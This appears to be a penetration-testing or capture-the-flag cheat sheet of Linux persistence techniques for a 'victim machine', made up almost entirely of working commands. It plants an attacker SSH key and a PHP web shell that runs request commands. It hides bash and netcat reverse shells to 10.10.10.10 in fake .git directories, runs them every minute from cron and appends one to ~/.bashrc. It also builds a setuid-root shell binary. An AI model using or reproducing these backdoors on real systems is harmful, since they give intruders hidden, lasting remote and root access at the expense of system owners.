- Can be root or normal user.
echo "SSH_PUB_KEY_HERE" > ~/.ssh/authorized_keys
- Most likely need to be root, depends on if apache2 is already running, as well as web root permissions for your current user.
- On victim machine
sudo systemctl start apache2
cd /var/www/html
nano ANKWTxiy11ugLHdaxJ.php
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
http://target.com/ANKWTxiy11ugLHdaxJ.php?cmd=cat+/etc/passwd
mkdir /usr/lib/.git
cd /usr/lib/.git
echo '#!/bin/bash
bash -i >& /dev/tcp/10.10.10.10/443 0>&1 || rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.10.10 443 >/tmp/f' > .git
chmod +x .git
mkdir /var/tmp/.git
cd /var/tmp/.git
echo '#!/bin/bash
bash -i >& /dev/tcp/10.10.10.10/443 0>&1 || rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.10.10 443 >/tmp/f' > .git
chmod +x .git
crontab -e
* * * * * /bin/bash -c /usr/lib/.git/.git
* * * * * /bin/bash -c /var/tmp/.git/.git
- Can be used as the root or non root user
cd ~
echo 'bash -i >& /dev/tcp/10.10.10.10/443 0>&1 || rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.10.10 443 >/tmp/f' >> ~/.bashrc
tail ~/.bashrc
- Need to be root, great backdoor if for example you found a priv-esc as a normal user and want an ability to priv-esc up in the future
- Depends on having
gcc on the target
which gcc
echo 'int main() { setresuid(0,0,0); system("/bin/sh"); }' > boot.c
gcc -o boot boot.c
rm boot.c
chmod u+s boot